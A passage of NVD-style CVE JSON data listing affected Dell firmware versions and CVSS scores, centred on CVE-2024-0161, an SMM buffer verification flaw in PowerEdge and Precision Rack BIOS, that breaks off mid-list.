"operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:inspiron_7501:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:inspiron_7500_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.28.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:inspiron_7500:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:g7_7700_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.32.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:g7_7700:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:g7_7500_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.32.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:g7_7500:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:g5_5500_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.30.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:g5_5500:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:g3_3500_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.30.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:g3_3500:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "PHYSICAL", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 6.8, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 0.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-06-12T07:15Z", "lastModifiedDate" : "2024-11-21T08:45Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0161", "ASSIGNER" : "secure@dell.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.dell.com/support/kbdoc/en-us/000222979/dsa-2024-006-security-update-for-dell-poweredge-server-bios-for-an-improper-smm-communication-buffer-verification-vulnerability", "name" : "https://www.dell.com/support/kbdoc/en-us/000222979/dsa-2024-006-security-update-for-dell-poweredge-server-bios-for-an-improper-smm-communication-buffer-verification-vulnerability", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://www.dell.com/support/kbdoc/en-us/000222979/dsa-2024-006-security-update-for-dell-poweredge-server-bios-for-an-improper-smm-communication-buffer-verification-vulnerability", "name" : "https://www.dell.com/support/kbdoc/en-us/000222979/dsa-2024-006-security-update-for-dell-poweredge-server-bios-for-an-improper-smm-communication-buffer-verification-vulnerability", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Dell PowerEdge Server BIOS and Dell Precision Rack BIOS contain an Improper SMM communication buffer verification vulnerability. A local low privileged attacker could potentially exploit this vulnerability leading to arbitrary writes to SMRAM." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_t360_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.1.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_t360:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r360_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.1.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r360:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r650_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.13.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r650:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r750_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.13.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r750:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r750xa_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.13.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r750xa:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_c6520_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.13.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_c6520:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_mx750c_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.13.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_mx750c:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r550_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.13.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r550:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r450_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.13.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r450:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r650xs_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.13.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r650xs:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r750xs_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.13.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r750xs:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_t550_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.13.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_t550:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_xr11_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.13.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_xr11:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_xr12_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.13.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_xr12:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_xr4510c_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.14.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_xr4510c:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_xr4520c_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.14.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_xr4520c:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_t150_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.9.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_t150:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_t350_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.9.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_t350:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r250_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.9.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r250:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r350_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.9.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r350:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r740_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.21.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r740:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r740xd_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.21.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r740xd:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r640_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.21.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r640:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r940_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.21.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r940:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r540_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.21.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r540:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r440_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.21.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r440:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_t440_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.21.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_t440:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_xr2_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.21.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_xr2:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r740xd2_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.21.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r740xd2:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r840_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.21.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r840:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r940xa_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.21.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r940xa:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_t640_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.21.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_t640:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_c6420_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.21.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_c6420:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_fc640_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.21.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_fc640:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_m640_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.21.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_m640:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_m640_\\(pe_vrtx\\)_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.21.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_m640_\\(pe_vrtx\\):-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_mx740c_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.21.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_mx740c:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_mx840c_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.21.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_mx840c:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_c4140_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.21.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_c4140:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:dss_8440_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.21.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:dss_8440:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_xe2420_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.21.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_xe2420:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_xe7420_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.21.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_xe7420:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_xe7440_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.21.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_xe7440:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r730_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.19.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r730:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r730xd_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.19.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r730xd:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r630_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.19.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r630:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_c4130_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.19.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_c4130:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r930_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.14.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, 